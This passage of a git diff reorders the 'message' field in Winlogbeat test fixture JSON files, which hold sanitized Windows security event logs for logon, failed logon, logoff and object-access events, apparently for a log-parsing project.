     "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}",
diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json
index ac5882d46..85bda7ac7 100644
--- a/Beats/winlogbeat/tests/security_event_4625.json
+++ b/Beats/winlogbeat/tests/security_event_4625.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}",
diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json
index ddc69e63b..035469c13 100644
--- a/Beats/winlogbeat/tests/security_event_4634.json
+++ b/Beats/winlogbeat/tests/security_event_4634.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json
index 3d80320f5..3f1de8e53 100644
--- a/Beats/winlogbeat/tests/security_event_4662.json
+++ b/Beats/winlogbeat/tests/security_event_4662.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
